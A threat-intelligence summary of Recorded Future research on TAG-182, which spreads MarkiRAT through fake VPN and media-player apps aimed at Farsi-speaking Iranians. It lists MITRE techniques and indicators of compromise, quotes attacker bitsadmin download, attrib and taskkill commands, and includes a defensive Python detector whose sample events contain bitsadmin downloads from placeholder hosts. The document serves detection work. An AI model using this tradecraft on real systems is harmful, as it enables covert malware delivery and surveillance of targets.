TAG-182 is using MarkiRAT and fake Android apps, including VPN and media tools, to target Farsi-speaking Iranians through staged websites and social media, especially Instagram. The infrastructure and tradecraft overlap with Ferocious Kitten, while Iranian security and surveillance bodies appear to be expanding digital monitoring after the partial restoration of internet access in Iran. #TAG-182 #MarkiRAT #FerociousKitten #Instagram #Iranians
Key points
- TAG-182 is highly likely part of Iran’s surveillance ecosystem and uses MarkiRAT to collect intelligence from Iranian targets.
- The group distributes malware through fake Android applications posing as VPNs and media-player tools such as YESHICA and Pis2ray VPN.
- Insikt Group found infrastructure linked to TAG-182, including domains hosted on 212.83.61.198 and 46.30.191.105.
- TAG-182’s tradecraft overlaps with historical MarkiRAT activity attributed to Ferocious Kitten, including BITS-based download behavior.
- The group appears to focus on Farsi-speaking users and uses Instagram posts and staged websites to promote malicious downloads.
- Iranian authorities are likely increasing cyber surveillance and digital enforcement following renewed internet access and internal security concerns.
- The report suggests TAG-182 is likely tied to broader pro-Iranian surveillance actors, including GreenEcho, Ferocious Kitten, and Rampant Kitten.
MITRE Techniques
- [T1583.001] Acquire Infrastructure: Domains – TAG-182 registered and used multiple malicious domains to host staging sites and lure victims (‘custom-built a website that acts as a staging point’ and domains such as yeplayer[.]store, pis2ray[.]online).
- [T1566.001] Phishing: Spearphishing Attachment – The group delivered staged payload archives and installers as malicious downloads (‘free download tools’ and files such as YEPlayer[.]rar and Pis2rayVPN.msi).
- [T1566.002] Phishing: Spearphishing Link – Victims were directed to malicious websites and social media posts that promoted fake apps (‘social media threads … identified on Instagram’ and links to staging websites).
- [T1204.002] User Execution: Malicious File – Execution depended on users downloading and running the fake applications or extracted payloads (‘Upon extraction and execution of YEPlayer.exe’).
- [T1197] BITS Jobs – MarkiRAT used bitsadmin jobs to download files and stage payloads (‘bitsadmin /addfile pdj “hxxp[:]//microsotf[.]come-site[.]website/…’).
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – The malware executed command-line actions such as attrib and taskkill to manipulate files and processes (‘attrib -h’ and ‘taskkill /im svehost.exe /t /f’).
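As an added defender-side example (not code from the Recorded Future report), the Python below scores constructed process-creation records for the command-line tradecraft listed above: a BITS job writing into a public directory, attrib toggling the hidden flag on a file there, and taskkill aimed at a process name one edit away from a real Windows binary. Hostnames, the URL and the parent images are assumed sample values; the correlation threshold of two distinct indicators per host is an assumption as well.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation records ("host|image|command_line"). Hostnames,
# the URL and most paths are made up; only the command shapes mirror the report's quotes.
SAMPLE_EVENTS = [
    "ws01|C:\\Users\\Public\\YEPlayer.exe|bitsadmin /addfile pdj http://staging.example.invalid/up/x.bin C:\\Users\\Public\\AppData\\Windows\\svehost.exe",
    "ws01|C:\\Windows\\System32\\cmd.exe|attrib -h C:\\Users\\Public\\AppData\\Windows\\svehost.exe",
    "ws01|C:\\Windows\\System32\\cmd.exe|taskkill /im svehost.exe /t /f",
    "ws02|C:\\Windows\\System32\\cmd.exe|taskkill /im notepad.exe /f",
    "ws02|C:\\Windows\\System32\\svchost.exe|bitsadmin /transfer job http://example.invalid/a.cab C:\\ProgramData\\a.cab",
]
PUBLIC_PATH = re.compile(r"(?:C:\\Users\\Public|%PUBLIC%)\\", re.IGNORECASE)
URL = re.compile(r"https?://\S+", re.IGNORECASE)
SYSTEM_PROCESSES = ("svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "explorer.exe")

def edit_distance(a, b):
    """Levenshtein distance, used to catch names one typo away from a Windows binary."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify(command_line):
    """Map one command line to an indicator name, or None when nothing matches."""
    tokens = command_line.lower().split()
    exe = tokens[0].rsplit("\\", 1)[-1] if tokens else ""   # binary name without its path
    if exe.startswith("bitsadmin") and URL.search(command_line) and PUBLIC_PATH.search(command_line):
        return "bits_download_to_public_path"       # T1197: BITS job writing into a user-writable public dir
    if exe == "attrib" and any(t in ("-h", "+h") for t in tokens) and PUBLIC_PATH.search(command_line):
        return "hidden_attribute_change_in_public_path"   # attrib toggling the hidden flag on a dropped file
    if exe == "taskkill" and "/im" in tokens and tokens.index("/im") + 1 < len(tokens):
        target = tokens[tokens.index("/im") + 1]
        if target not in SYSTEM_PROCESSES and any(edit_distance(target, p) == 1 for p in SYSTEM_PROCESSES):
            return "lookalike_system_process_name"    # e.g. svehost.exe is one edit away from svchost.exe
    return None

def suspicious_hosts(events, min_indicators=2):
    """Return {host: sorted indicators} for hosts showing at least min_indicators distinct behaviours."""
    seen = defaultdict(set)
    for record in events:
        host, _image, command_line = record.split("|", 2)
        indicator = classify(command_line)
        if indicator:
            seen[host].add(indicator)
    return {h: sorted(i) for h, i in seen.items() if len(i) >= min_indicators}
```

Run `suspicious_hosts(SAMPLE_EVENTS)` to see that only ws01 is reported; the single benign taskkill and the BITS transfer into ProgramData on ws02 are not enough on their own.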
Indicators of Compromise
- [SHA256 Hash] MarkiRAT-related samples and staging files – 3b172281f65ceaee280ae810edb6fd39a1ecd25649f929f246c0405df94f4c89, 66dcd98c6b310f4429890821e609d48cc6395a6be15ffe5a121ec68b7a8f7402, and 2 more hashes.
- [File Name] Malware and staging artifacts – YEPlayer.dll, YEMPlayer.zip, and other filenames such as Pis2rayVPN.msi and Pis2rayN.dll.
- [Domain] Malicious staging and C2 domains – yeplayer[.]store, microsotf[.]comi-site[.]website, and other domains such as starvpn[.]pis2ray[.]online and comisignin[.]online.
- [IP Address] Infrastructure hosting TAG-182 domains – 212[.]83[.]61[.]198, 46[.]30[.]191[.]105, and other IPs including 45[.]86[.]162[.]197 and 89[.]144[.]145[.]237.
- [URL / Path] Payload delivery and beaconing paths – /files/YEPlayer[.]rar, /up/uploadx.php, and /i.php?u= used for staging and exfiltration-related communication.
- [File Path] Malware drop locations and manipulation paths – C:\Users\Public\AppData\Windows\svehost.exe and %PUBLIC%\AppData\Libsp.b.
Read more: https://www.recordedfuture.com/research/nexus-tag182-disseminates-markirat